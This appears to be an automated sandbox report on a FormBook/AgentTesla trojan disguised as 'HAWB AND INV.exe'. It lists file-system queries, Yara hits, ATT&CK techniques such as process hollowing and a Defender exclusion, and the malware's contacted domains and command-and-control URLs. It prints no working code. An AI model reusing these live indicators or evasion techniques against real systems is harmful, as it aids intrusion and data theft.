          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Scheduled Task/Job1Process Injection512Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools11LSASS MemorySecurity Software Discovery431Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion151Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSVirtualization/Sandbox Evasion151Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery112Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 402848 Sample: HAWB AND INV.exe Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 43 www.jaimericart.com 2->43 45 www.beachrockisland.com 2->45 47 2 other IPs or domains 2->47 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Multi AV Scanner detection for dropped file 2->65 67 10 other signatures 2->67 9 HAWB AND INV.exe 7 2->9         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\qxnptkmQbHB.exe, PE32 9->37 dropped 39 C:\Users\user\AppData\Local\...\tmp9D41.tmp, XML 9->39 dropped 41 C:\Users\user\...\HAWB AND INV.exe.log, ASCII 9->41 dropped 73 Adds a directory exclusion to Windows Defender 9->73 13 HAWB AND INV.exe 9->13         started        16 powershell.exe 26 9->16         started        18 powershell.exe 24 9->18         started        20 2 other processes 9->20 signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 13->75 77 Maps a DLL or memory area into another process 13->77 79 Sample uses process hollowing technique 13->79 81 Queues an APC in another process (thread injection) 13->81 22 explorer.exe 13->22 injected 26 conhost.exe 16->26         started        28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        32 conhost.exe 20->32         started        process9 dnsIp10 49 www.premier-moment.info 202.254.234.152, 49757, 80 SAKURA-CSAKURAInternetIncJP Japan 22->49 51 ecosanhn.com 181.214.142.2, 49760, 80 ASDETUKhttpwwwheficedcomGB Chile 22->51 53 8 other IPs or domains 22->53 69 System process connects to network (likely due to code injection or exploit) 22->69 71 Uses ipconfig to lookup or modify the Windows network settings 22->71 34 ipconfig.exe 22->34         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 34->55 57 Maps a DLL or memory area into another process 34->57 59 Tries to detect virtualization through RDTSC time measurements 34->59

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          HAWB AND INV.exe21%ReversingLabsWin32.Trojan.AgentTesla

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe21%ReversingLabsWin32.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.HAWB AND INV.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.premier-moment.info0%VirustotalBrowse
          ecosanhn.com0%VirustotalBrowse
          jaimericart.com0%VirustotalBrowse
          networkingmaderas.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.microX%0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          www.alldaazz.com/maw9/0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.networkingmaderas.com/maw9/?AVF=CxDYGZqaFGf+wggxXYaRsXxHYh0vkMvLuxQU/eiz8BKY71rUvugXdjEA5Q+gRIVecMz1lX5ZhQ==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe
          http://www.dinkoistmatrimony.com/maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx40%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
